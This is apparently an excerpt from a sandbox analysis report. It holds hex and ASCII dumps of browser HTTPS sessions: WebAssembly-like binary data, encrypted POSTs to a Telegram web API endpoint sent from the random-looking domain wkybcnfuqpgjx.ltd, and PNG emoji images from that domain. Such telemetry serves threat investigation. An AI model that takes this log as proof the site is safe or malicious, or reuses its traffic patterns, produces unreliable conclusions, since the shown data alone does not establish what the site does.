                                  2025-01-12 00:03:58 UTC1369INData Raw: 10 fc 08 20 02 36 02 00 20 00 10 fc 08 41 00 36 02 00 02 40 20 03 41 03 46 04 40 20 05 10 fb 08 45 0d 01 0c 12 0b 20 05 10 fa 08 0d 11 0b 20 00 10 25 0d 0a 0c 11 0b 20 00 20 04 20 05 41 01 10 aa 05 41 01 41 04 20 00 10 25 1b 0f 0b 20 02 41 05 47 0d 09 20 04 10 62 1a 41 0d 0f 0b 20 00 20 04 20 05 10 ed 02 41 01 41 05 20 00 10 25 1b 0f 0b 20 00 20 04 20 05 10 ed 02 41 01 41 08 20 00 10 25 1b 0f 0b 20 04 10 62 1a 20 00 10 f9 08 28 02 00 21 01 20 00 10 f9 08 20 01 41 01 6a 36 02 00 20 03 0f 0b 20 01 41 0c 46 04 40 20 00 10 25 0d 07 20 00 41 04 20 04 10 73 10 58 41 01 0f 0b 20 00 10 91 04 28 02 00 21 03 20 00 10 91 04 28 02 00 21 02 20 05 10 a9 05 45 04 40 20 00 10 25 0d 08 0c 0c 0b 0c 0c 0b 20 01 41 0b 46 04 40 20 00 10 25 0d 08 20 00 41 03 20 04 10 73 10 58
                                  Data Ascii: 6 A6@ AF@ E % AAA % AG bA AA % AA % b (! Aj6 AF@ % A sXA (! (! E@ % AF@ % A sX
                                  2025-01-12 00:03:58 UTC1369INData Raw: 1a 20 02 41 bc 7f 6a 22 02 10 b0 09 20 01 20 02 47 0d 00 0b 0b 20 00 20 01 36 02 04 0b 2c 01 01 7f 20 00 28 02 00 04 40 20 00 20 00 28 02 00 10 c0 11 20 00 10 1d 1a 20 00 28 02 00 21 01 20 00 10 c3 02 1a 20 01 10 1f 0b 0b 42 01 01 7f 23 00 41 10 6b 22 01 24 00 20 00 10 1d 1a 20 01 41 c3 87 8f 1e 36 02 0c 20 01 41 ff ff ff ff 07 36 02 08 20 01 41 0c 6a 20 01 41 08 6a 10 b2 01 28 02 00 21 00 20 01 41 10 6a 24 00 20 00 0b 38 00 20 00 41 00 36 02 04 20 00 20 01 36 02 00 20 00 41 08 6a 10 8f 01 1a 20 00 41 30 6a 10 7f 1a 20 00 41 34 6a 10 7f 1a 20 00 41 38 6a 10 81 02 20 00 41 00 3a 00 40 0b 5a 01 02 7f 23 00 41 10 6b 22 02 24 00 20 02 20 01 36 02 0c 20 00 10 c2 11 22 03 20 01 4f 04 40 20 00 10 c3 02 22 00 20 03 41 01 76 49 04 40 20 02 20 00 41 01 74 36 02 08
                                  Data Ascii: Aj" G 6, (@ ( (! B#Ak"$ A6 A6 Aj Aj(! Aj$ 8 A6 6 Aj A0j A4j A8j A:@Z#Ak"$ 6 " O@ " AvI@ At6
                                  2025-01-12 00:03:58 UTC1369INData Raw: 73 72 0b 0b 4a 01 04 7d 20 00 28 02 00 2a 02 00 21 03 20 02 b2 21 04 20 00 10 82 03 2a 02 04 21 05 02 7f 20 03 20 01 b2 22 06 5e 41 01 73 45 04 40 41 00 20 03 20 04 5e 0d 01 1a 0b 20 05 20 06 5d 41 01 73 20 05 20 04 5d 41 01 73 72 0b 0b 4a 01 04 7d 20 00 28 02 00 2a 02 00 21 03 20 02 b2 21 04 20 00 10 cd 02 2a 02 04 21 05 02 7f 20 03 20 01 b2 22 06 5e 41 01 73 45 04 40 41 00 20 03 20 04 5e 0d 01 1a 0b 20 05 20 06 5d 41 01 73 20 05 20 04 5d 41 01 73 72 0b 0b 30 01 01 7f 20 01 20 00 28 02 04 22 02 47 04 40 03 40 20 00 10 1d 1a 20 02 41 7c 6a 22 02 10 6a 20 01 20 02 47 0d 00 0b 0b 20 00 20 01 36 02 04 0b 52 01 02 7f 23 00 41 30 6b 22 06 24 00 20 06 41 18 6a 41 24 10 26 20 06 41 10 6a 20 06 41 28 6a 41 01 10 55 10 69 22 07 28 02 00 20 01 20 02 20 03 20 04 20
                                  Data Ascii: srJ} (*! ! *! "^AsE@A ^ ]As ]AsrJ} (*! ! *! "^AsE@A ^ ]As ]Asr0 ("G@@ A|j"j G 6R#A0k"$ AjA$& Aj A(jAUi"(
                                  2025-01-12 00:03:58 UTC1369INData Raw: 41 08 6a 10 32 20 00 10 1d 20 01 10 27 10 32 20 01 20 01 28 02 04 36 02 00 20 00 20 00 10 a6 01 10 be 05 0b 7d 01 02 7f 23 00 41 20 6b 22 03 24 00 20 00 10 1d 22 02 20 03 41 08 6a 20 00 20 00 10 a6 01 41 01 6a 10 c0 05 20 00 10 a6 01 20 02 10 bf 05 22 02 28 02 08 20 01 10 b9 09 20 02 20 02 28 02 08 41 18 6a 36 02 08 20 00 20 02 10 e5 11 20 02 20 02 28 02 04 10 e1 11 20 02 28 02 00 04 40 20 02 28 02 10 1a 20 02 28 02 00 21 00 20 02 10 bd 05 1a 20 00 10 1f 0b 20 03 41 20 6a 24 00 0b 3e 01 02 7f 23 00 41 10 6b 22 03 24 00 20 03 20 00 41 01 10 c1 05 21 02 20 00 10 1d 20 02 28 02 04 20 01 10 b9 09 20 02 20 02 28 02 04 41 18 6a 36 02 04 20 02 10 6f 20 03 41 10 6a 24 00 0b 0c 00 20 00 10 c2 05 1a 20 00 10 1f 0b 09 00 20 00 10 be 09 10 1f 0b 09 00 20 00 10 bf 09
                                  Data Ascii: Aj2 '2 (6 }#A k"$ " Aj Aj "( (Aj6 ( (@ ( (! A j$>#Ak"$ A! ( (Aj6 o Aj$
                                  2025-01-12 00:03:58 UTC1294INData Raw: 41 01 73 45 04 40 20 00 20 03 43 00 00 80 bf 92 20 04 10 9b 04 0f 0b 20 00 20 03 20 04 43 00 00 80 bf 92 10 9b 04 0f 0b 41 00 20 03 43 00 00 00 00 60 41 01 73 45 20 04 43 00 00 00 00 60 41 01 73 1b 0d 00 20 03 43 00 00 00 00 5d 41 01 73 22 01 20 04 43 00 00 00 00 5d 41 01 73 72 45 04 40 20 00 20 03 43 00 00 80 3f 92 20 04 43 00 00 80 3f 92 10 c4 05 0f 0b 20 01 45 04 40 20 00 20 03 43 00 00 80 3f 92 20 04 10 9b 04 0f 0b 20 00 20 03 20 04 43 00 00 80 3f 92 10 9b 04 0f 0b 20 00 20 03 20 04 10 c4 05 0b 6b 00 23 00 41 10 6b 22 02 24 00 20 00 41 00 3a 00 28 20 01 20 00 28 02 0c 47 04 40 20 02 41 08 6a 20 00 28 02 24 20 01 10 fd 11 02 40 20 00 2a 02 10 20 02 2a 02 08 10 48 04 40 20 00 2a 02 14 20 02 2a 02 0c 10 48 0d 01 0b 20 00 41 01 3a 00 28 20 00 20 02 29 03
                                  Data Ascii: AsE@ C CA C`AsE C`As C]As" C]AsrE@ C? C? E@ C? C? k#Ak"$ A:( (G@ Aj ($ @ * *H@ * *H A:( )


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  77192.168.2.649956149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:58 UTC350OUTGET /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:58 UTC312INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:58 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:03:58 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  78192.168.2.649957149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:58 UTC450OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 152
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:58 UTC152OUTData Raw: 2a 10 06 78 25 cb 00 4d 7b d5 c9 3d 4a 4c c6 8d 56 92 dd 0f 33 1f 86 99 41 8b db ae 1c 32 7c 63 f7 f4 a4 7b 67 09 77 0a 0d 44 3c e9 3e a6 71 3d 94 43 f1 63 74 8e 26 7f 3f 61 fe ad c7 f1 5f 62 3b dc f3 30 fc c1 38 3b bd fc f2 99 58 54 a9 8e 11 bd f5 fa 5e 96 4b f5 c9 f6 13 a6 35 5c ae 67 52 40 6b 6f 7b f3 8b 40 62 a9 9e 14 67 5f 0d f6 de 2f f1 72 be 1b 8a 11 10 a4 8e 96 9e d6 72 6e 20 8e 27 4a fc 63 52 b8 4e c3 43 38 05 e4 2d 1c 34 a4 47 e9 42 53 65 07
                                  Data Ascii: *x%M{=JLV3A2|c{gwD<>q=Cct&?a_b;08;XT^K5\gR@ko{@bg_/rrn 'JcRNC8-4GBSe
                                  2025-01-12 00:03:58 UTC408INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:58 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 536
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:58 UTC536INData Raw: 2a 10 06 78 25 cb 00 4d 63 ad 15 0e 49 fd 36 69 09 31 a3 d1 ff 2c 48 4d 57 cd 8c da 39 ac a8 8c 87 f4 b5 d6 4f 5b 2e 17 59 5d 0d c8 b3 67 dc 48 05 18 cb 6c bc ec 1d 0b 20 d9 cd 44 1d de 4c ba 5f 69 52 ad db e3 34 cd ac 55 ea 5e 6e f3 66 cc 11 4d 61 b0 80 b6 65 4e 54 bf 02 b8 79 c4 92 db 03 4d ba 64 69 3b 3c 4c e4 67 9b 4d 1f ef 8f b9 95 cb 76 8c 56 87 9a 39 91 da 5f 8c 85 21 a1 ad 88 df 3c 03 1d 2a 18 a1 8b 7b 2e cd 14 0d 36 68 48 fd f2 17 4c ac 28 5e 0e f1 94 56 e8 a2 99 f4 cb 3f 92 3b 21 1b 64 32 8f e2 d4 62 3b 74 b7 c8 dd 30 e3 77 52 c1 16 28 be 17 af e4 b5 68 4f 95 74 b9 b9 e6 51 1b 89 5e 6f b5 1b 57 91 d8 4c 10 ee be 01 c4 38 16 87 2a de dd 1b 0e cb 7a 96 bd 8c 85 33 38 66 5a c3 23 9f bb 7b e0 37 83 88 4f 3a 5f 7e d3 19 d0 5a 14 f2 1d 2a 63 06 64 0b
                                  Data Ascii: *x%McI6i1,HMW9O[.Y]gHl DL_iR4U^nfMaeNTyMdi;<LgMvV9_!<*{.6hHL(^V?;!d2b;t0wR(hOtQ^oWL8*z38fZ#{7O:_~Z*cd


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  79192.168.2.649970172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:59 UTC608OUTGET /img-apple-160/1f1e6-1f1eb.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:59 UTC899INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:59 GMT
                                  Content-Type: image/png
                                  Content-Length: 4644
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-1224"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=idb42gV6jeOzShp9JafF3rYbJrbm2a%2BP6cvKIO7JVvaR4HNx%2FTFKWtQ295GRuxn%2BFxnTRkhSidmWZG9Pk8yfRQmp0kxALQVi2c4QLf9QvkY0kdPKGD0eyMNNW7CnKICh4YB9Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2f6bf785e62-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=6633&min_rtt=1579&rtt_var=3743&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1186&delivery_rate=1849271&cwnd=139&unsent_bytes=0&cid=8dce2ec0a5f0aef0&ts=637&x=0"
                                  2025-01-12 00:03:59 UTC470INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 47 24 0f 96 6f 69 71 57 4c 30 35 1e 63 9b 61 39 49 23 3d 1b 0d a3 6a 6a 62 9e 62 14 48 13 45 0e 0e 13 62 13 17 6f 17 04 04 04 61 61 61 04 48 04 b6 6c 6c 65 12 12 61 9c 61 01 01 01 0b 4f 0b 2c 2c 2c 09 07 07 b6 6d 6d 62 9c 62 63 63 63 67 12 13 07 49 07 05 07 07 b5 6c 6c 62 62 62 b7 6b 6c 67 13 13 07 07 07 b6 6c 6c 63 63 63 60 9c 60 0b 4f 0b 07 07 07 67 13 13 63 64 64 b5 6c 6c 06 06 06 4c 4c 4c 06 49 06 65 64 64 09 4e 08 5d 99 5d 65 a1 65 f7 eb e4 f2 ef d0 f4 e3 d4 ed e2 bf f4 d8 d7 eb d6 b4 f1 ce cc e9 cc ac ed c4 c1 e5 cb 9a e9 bc b6 e3 bd 98 dd bf 7f e9 af af de b9 88 e0 ad 8f d9 b5 75 e5 a4 a3 da af 78 e5 9b 9d d6 ac 66 d7
                                  Data Ascii: PNGIHDRPLTEGpLG$oiqWL05ca9I#=jjbbHEboaaaHlleaaO,,,mmbbcccgIllbbbklgllccc``OgcddllLLLIeddN]]eeuxf
                                  2025-01-12 00:03:59 UTC1369INData Raw: 04 84 04 4f 4f 4f c0 1e 1e 03 83 03 4e 4e 4e b5 22 21 c4 1b 1c bd 1e 1e bb 1d 1d 01 81 01 c6 16 21 00 80 00 00 7f 00 4b 4a 4a c0 17 1d c4 16 17 ac 20 20 01 7d 01 14 6f 14 b3 1c 1c 07 76 07 15 6c 15 af 1b 1b c0 12 17 a4 1d 1d 44 45 45 c3 0d 13 04 6d 04 0f 65 0f 98 1b 1b 40 3f 3f be 06 08 0f 5d 0e 8d 1a 1a 03 63 03 0d 59 0e 84 17 17 0d 53 0c 7e 16 16 03 56 03 79 16 16 3c 2e 2e fb f3 f3 30 30 30 70 14 14 69 12 12 02 48 02 29 28 28 2a 1a 1a 1e 1f 1f 24 16 16 1a 1a 1a 19 19 19 18 18 18 17 17 17 0e 1a 1a 15 15 15 1c 12 12 13 13 13 11 11 11 18 0e 0e 0f 0f 0f 0e 0e 0e 0c 0d 0d 0c 0c 0c 0a 0a 0a 08 08 08 07 07 07 05 05 05 04 04 04 02 02 02 01 01 01 00 00 00 3d 96 3b 3a 8b 3a 35 90 33 21 8f 21 03 82 03 46 91 45 c1 3c 3c 15 84 15 2e 9b 2e 06 85 06 b7 54 54 bd 46 46
                                  Data Ascii: OOONNN"!!KJJ }ovlDEEme@??]cYS~Vy<..000piH)((*$=;::53!!FE<<..TTFF
                                  2025-01-12 00:03:59 UTC1369INData Raw: ec 64 fd 3d 44 ca db 4f df f1 f9 8e 7d be ef 12 88 e2 ad b7 56 c6 df bc b9 52 fe 02 39 11 74 15 6f a0 78 fd f5 d7 1f 3e 7c f8 e3 9f fc e8 87 f0 5b 48 f8 6c a0 bd 8e 0d f0 c9 93 6b c0 77 ef dd df 00 4f ef bd f6 97 5b 03 7f 77 4e 44 ab fd e6 af 91 72 c5 fc f9 cf 90 74 45 45 c8 87 37 00 6f b6 a1 b0 2c 24 fc c6 57 9f 05 3c 7d 0f 78 ff ff 01 be 89 88 17 79 44 f1 22 e0 75 db 65 5c 03 7e 71 03 bc 7f fa 91 32 88 80 17 29 5c fb 36 c0 f5 33 78 b9 49 d0 4a 5e a3 7d 00 f8 e9 57 9f a0 5d 72 71 1a 23 e0 e3 75 06 51 0a 2f 81 8f 5e 16 f0 e1 15 e0 7c 8e 12 88 80 d7 6d 1b e0 d7 af 00 51 0a d7 c0 d3 15 f0 3b ef 01 ff f9 d1 80 6f 20 df 05 70 ed 9b 5f 02 ef 9c 5b 6c eb d6 c0 af 5c bc 11 a2 14 9e 27 10 01 ff fe b2 80 ab 5d 7c fc 60 03 bc 58 df 15 0f 42 00 6c e8 02 08 6c fb 16
                                  Data Ascii: d=DO}VR9tox>|[HlkwO[wNDrtEE7o,$W<}xyD"ue\~q2)\63xIJ^}W]rq#uQ/^|mQ;o p_[l\']|`XBll
                                  2025-01-12 00:03:59 UTC1369INData Raw: 86 f3 0c 0e 77 13 09 19 c5 12 04 96 7d 3c 2d 12 83 06 4d 70 5a 4a ed e7 76 89 a6 03 eb 14 c6 57 85 fc a1 7f f3 77 f1 f6 81 53 51 ac ee 31 b9 dc 4e 3b b0 6d 5f 5b 55 bc e0 90 33 76 53 89 28 2a 7f e5 29 2f d4 35 8e e6 87 4e 48 1f ee 0b 4f a5 c4 7e a0 56 29 05 da c7 81 10 4b a5 72 64 fa e2 7d 30 c9 b4 c9 f4 4e 72 bf d7 c8 d3 e3 e3 70 ae 3e 10 70 40 d1 55 ad 85 11 d5 3b 4e d0 48 c4 96 2b db ea 82 50 07 7e d0 3d ff 27 c7 e5 82 67 df 04 7c fc 71 00 0d 9e e6 55 95 25 44 35 90 56 98 6c b9 a7 eb 26 08 02 e8 ea a9 62 ee 9c 18 b7 5c eb 06 e0 95 fb c1 ed 00 4f 1e 54 29 81 68 55 59 b1 aa 91 e5 9e e9 06 b3 33 89 24 25 57 2f cd 34 9e 3a 34 f7 88 68 66 e4 4f 3e 00 dc b4 21 b6 0f 5c 78 43 96 16 f8 56 9f 4e 45 d2 bd c0 07 ee b8 67 4e 50 0e b3 8c 2b 14 39 75 50 17 b0 81 1f
                                  Data Ascii: w}<-MpZJvWwSQ1N;m_[U3vS(*)/5NHO~V)Krd}0Nrp>p@U;NH+P~='g|qU%D5Vl&b\OT)hUY3$%W/4:4hfO>!\xCVNEgNP+9uP
                                  2025-01-12 00:03:59 UTC67INData Raw: 0a 88 c6 92 98 b5 e3 d0 77 4c 0d ee da 56 93 55 4d d3 2d c7 f7 c3 38 8e c3 32 c7 d2 35 1c d9 b6 a3 28 8a a2 28 8a a2 28 8a a2 28 8a a2 a8 1f de 85 73 5a fe ed 1a cf 00 00 00 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: wLVUM-825((((sZIENDB`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  80192.168.2.649969172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:59 UTC608OUTGET /img-apple-160/1f1e6-1f1f1.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:59 UTC897INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:59 GMT
                                  Content-Type: image/png
                                  Content-Length: 6110
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-17de"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=70rkZf%2F3KtMzSeDyoZxfDsS81dA317rxsLW7%2FPeWXuLUHUVgS4bJb8oq3uUvJGs7u3rnmPRxmpKM805MVEky3Bj0QBe4dyA4riwqNNTnkzldwYYCbrBInchB1wl0ry8PDQutCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2f6be9141c1-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=3122&min_rtt=1743&rtt_var=1638&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1186&delivery_rate=1675272&cwnd=205&unsent_bytes=0&cid=7f9c5cfeaef4c9fc&ts=638&x=0"
                                  2025-01-12 00:03:59 UTC472INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 8c 43 47 68 1b 1f b3 6f 72 6a 1b 1f b0 6a 6e 67 19 1d 66 18 1b b7 74 77 67 1a 1d b5 72 76 66 18 1c 9e 4b 4f b1 6d 71 74 20 25 8c 28 2e b8 75 79 99 36 3b 67 18 1c b1 6c 70 67 19 1d 75 11 17 89 2f 33 67 18 1c b1 6e 71 bb 78 7b 61 13 17 99 49 4c 6e 20 24 60 13 17 b3 70 74 a8 5f 63 6c 1e 22 61 14 18 ba 76 79 68 1a 1e ad 6a 6e b8 74 78 67 19 1d b1 6e 71 68 1b 1e ba 77 7a 6c 1f 22 bc 78 7b ae 69 6c 6d 1f 23 60 13 16 9a 41 45 a8 5a 5d bb 69 6d c2 62 67 ff 47 51 ba 64 69 c5 5d 62 fc 44 4e c6 59 5e fb 41 4a aa 64 67 b9 5d 62 ca 55 5b b0 60 64 f1 43 4d ed 42 4b cc 50 56 a9 5f 62 e9 42 4b f2 3d 47 c1 52 58 ce 4c 52 b6 56 5b e9 3f 47 e4
                                  Data Ascii: PNGIHDRPLTEGpLCGhorjjngftwgrvfKOmqt %(.uy6;glpgu/3gnqx{aILn $`pt_cl"avyhjntxgnqhwzl"x{ilm#`AEZ]imbgGQdi]bDNY^AJdg]bU[`dCMBKPV_bBK=GRXLRV[?G
                                  2025-01-12 00:03:59 UTC1369INData Raw: 3c bc 28 30 a4 31 37 bb 27 2e ab 2d 34 b8 27 2f b1 2a 31 b9 26 2d 94 36 3b b5 27 2e a8 2c 33 b8 24 2c b6 25 2c b8 24 2b ad 28 2f b6 23 2a 9a 2f 34 b1 24 2c b6 22 29 8e 33 38 b4 22 2a b2 22 29 b4 21 28 9c 2b 30 94 2d 32 88 32 37 b1 20 28 a3 26 2d b3 1f 27 aa 23 2a b1 1f 27 af 20 27 9a 29 2e 8f 2d 32 81 33 37 b2 1d 25 b0 1e 25 ae 1d 25 b0 1c 24 ab 1e 25 ad 1c 24 86 2d 31 ac 1c 24 ad 1b 21 a3 1f 26 aa 1c 23 ae 1a 22 7b 30 34 9e 20 26 8d 27 2d ac 19 21 94 23 29 aa 19 21 a6 1b 21 8b 26 2b 73 30 34 98 1e 24 85 26 2b 9f 19 20 93 1d 24 69 2f 32 73 2a 2e 7d 25 29 96 17 1d 8a 1c 22 61 2d 2f 91 17 1e 83 1d 23 76 22 26 65 27 2b 71 21 25 79 1d 22 59 2b 2d 89 14 1b 83 16 1c 6e 1e 22 50 2b 2d 7d 16 1c 6b 1b 1f 48 2a 2b 73 17 1c 7a 12 18 41 29 2a 4e 23 26 75 12 16 66 17
                                  Data Ascii: <(017'.-4'/*1&-6;'.,3$,%,$+(/#*/4$,")38"*")!(+0-227 (&-'#*' ').-237%%%$%$-1$!&#"{04 &'-!#)!!&+s04$&+ $i/2s*.}%)"a-/#v"&e'+q!%y"Y+-n"P+-}kH*+szA)*N#&uf
                                  2025-01-12 00:03:59 UTC1369INData Raw: fd 0f d0 ca b9 97 9f fd fc 67 c3 bc 37 c8 df bf 37 f9 de e4 30 13 53 07 38 92 c4 e9 ac a0 69 00 00 2e 91 10 12 26 d0 91 ea 76 8d 9c 7f fe f2 e5 ab d7 3e bd f1 d9 e7 07 c0 ad 17 07 c0 7b 03 e0 1f 4f 02 fe c7 60 cd fc ed ad e5 e5 a5 c5 45 b4 5f be 1f 7b 7f 90 90 f9 65 26 18 0c 05 51 ce 05 cf ed 65 0a 05 3d 6d 34 e2 79 bd e8 5f 4b 37 20 28 d6 01 c8 c6 8a b5 18 8e 5a 42 4c 89 3d 5d bc c8 1e 06 fe 6e 0f f8 e2 25 e0 ef 4f 04 fe 60 d6 fd 0f 4f bf 46 c6 df fe fa d7 bf 58 46 41 1b e7 02 ca 9c 99 0b 7b 99 9d 9d 9d 99 99 99 9e 46 3c 2f 41 12 04 45 11 44 68 d2 3b e1 a5 b2 f2 0e 80 72 21 54 83 ad 6c 21 33 4e 8c 4f 78 6d 74 5d 57 7b 29 e6 e2 51 e0 13 04 fc ee 00 f8 f8 e1 bd db 6f 00 44 7d 47 c4 a7 4f bf 7e f8 f5 d7 77 ef a2 85 e9 37 bf fc 45 3f 1f 9b b9 8c 72 d1 8c 29
                                  Data Ascii: g770S8i.&v>{O`E_{e&Qe=m4y_K7 (ZBL=]n%O`OFXFA{F</AEDh;r!Tl!3NOxmt]W{)QoD}GO~w7E?r)
                                  2025-01-12 00:03:59 UTC1369INData Raw: f9 61 49 a4 1d 20 0b c7 84 d3 b4 7a 61 ad c0 a1 16 8f 16 88 4a 72 7f 1f 78 f3 10 30 12 5d b0 db 7d 8c cb 6e cf e9 9d 21 50 12 8e 0b 58 0b 55 21 2a 09 aa f1 23 26 32 72 e0 57 af 02 a3 e1 4a b7 99 0a 33 ee 0b 15 5d 57 4e 07 d6 30 4b ac d0 ea 74 c4 0d 67 f8 4c 80 ec 42 77 d7 e8 b5 9b 4d c5 e8 34 4f 07 4a b0 46 5a f1 73 4b 2b 01 bb 6f 36 f2 e7 9e 62 b4 8f 5c 8a b2 3f f6 cc 92 ec ea cd c0 a2 da 39 0d c8 03 ad 16 c4 6c 63 63 ce c5 d9 51 8f e0 fd a3 c0 2b 03 e0 7c c4 7f ab d2 16 9b 95 94 7d ac a9 9e 36 82 a0 90 04 1a 97 89 2d ad 35 d5 0a 33 7a e0 9d a3 2d 36 81 97 a2 11 86 61 23 ac 6b cc 59 3d fd 19 04 0d 5b 8c d7 e0 8e a2 aa 46 93 19 65 8b 9f 1c 0f 64 59 bf 0b 65 b1 6d 28 a7 97 04 16 2d 13 55 55 53 8f b4 78 f4 c0 9b 87 80 6c aa d9 dc 58 59 45 1d 5e 5d 53 4f 05
                                  Data Ascii: aI zaJrx0]}n!PXU!*#&2rWJ3]WN0KtgLBwM4OJFZsK+o6b\?9lccQ+|}6-53z-6a#kY=[FedYem(-UUSxlXYE^]SO
